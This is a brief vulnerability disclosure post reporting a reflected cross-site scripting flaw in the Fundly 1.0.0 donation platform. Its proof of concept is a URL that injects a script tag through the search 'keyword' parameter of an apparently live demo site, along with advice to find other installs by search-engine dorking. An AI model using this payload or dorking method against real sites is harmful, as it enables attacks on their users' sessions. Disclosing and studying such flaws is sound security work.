============================================================================================================================ | # Title : Fundly 1.0.0 XSS Vulnerability | | # Author : indoushka | | # email : indoushka4ever@gmail.com | | # Tested on : windows 10 FranASSais V.(Pro) | | # Version : 1.0.0 | | # Vendor : https://codecanyon.net/item/fundly-a-donation-platform/21225201?s_rank=4 | | # Dork : n/a | ============================================================================================================================ poc : [+] Dorking Adegn Google Or Other Search Enggine [+] in Search box use payload : http://fundly.techvill.net/search?keyword=1%3C/title%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================